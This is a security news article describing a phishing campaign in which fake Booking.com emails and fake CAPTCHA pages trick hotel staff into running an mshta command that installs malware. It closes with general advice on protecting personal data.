Booking.com phish uses fake CAPTCHAs to trick hotel staff into downloading malware

A new phishing campaign that uses the fake CAPTCHA websites we reported about recently is targeting hotel staff in a likely attempt to access customer data, according to research from ThreatDown.

Here’s how it works: Cybercriminals send a fake Booking.com email to a hotel’s email address, asking them to confirm a booking.

The email is sent only a few days before the check-in-date, which is very likely to create a sense of urgency—a common tactic of scammers.

But if the hotel staff were to copy and paste the URL into the browser address bar they will be greeted by this fake CAPTCHA website.

When they check the box, they’ll then see “verification” instructions that will effectively infect their system.

As we explained in more detail here, these instructions will infect their Windows system with an information stealer or Trojan.

What the hotel staff would actually be doing is copy and pasting a mshta command into the Run prompt and then executing the command, which then fetches a remote file and then runs it on their system.

We don’t know the exact plans of the criminals once they have gained control over the system, but it’s highly likely they’re after customer payment details and other personal data: Data that is very valuable to them and can be traded on the dark web.

There isn’t much you can do to protect your own data in situations like these, when cybercriminals are attacking the companies that hold your personal information. However, there are a few things you can do to lower your risk.

How to protect your data online

Don’t store your card details. Not in your browser, not on websites. Sure, it’s more convenient to get sites to remember your card details for you, but we highly recommend not storing that information.
Find out what information is already out there. Our free Digital Footprint scan searches the dark web, social media, and other online sources, to tell you where your data has been exposed.
Remove as much of that information as you can. You can do this manually by cleaning things up yourself, or if you’re in the US then you can use Malwarebytes Personal Data Remover to do it for you.
Monitor your accounts. Check your accounts periodically for unexpected changes and notifications of suspicious login attempts.
Use a different password for every online account. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Pieter Arntz

Similar articles

2025-03-27

What are the 2025 must-have uses of AI in hotel marketing?

Recently Revfine asked its Panel of Digital Marketing Experts the question What are your top suggestions and best practices for using AI in hotel marketing activities (e.g., communication, data analysis, etc.)?

2025-03-24

How hospitality operators can combat payment fraud

Security threats are increasing in the hospitality industry. In the past year, over a third of hotel businesses have reported a rise in fraud attempts, while the proportion of guests concerned about booking fraud is as high as 71%. Among those who fell victim to deceptive transactions, £564 was the average amount lost per guest in 2024.

Search on site

Sections

Management (1124)
Promotion (680)
Technology (590)
Career (503)
Development (738)
Sustainability (23)
Tourism (386)
Events (216)

We use cookies 🍪 on all our sites, because without them some functions would not work.
Have a look how to enable cookies use for your browser in Yandex help.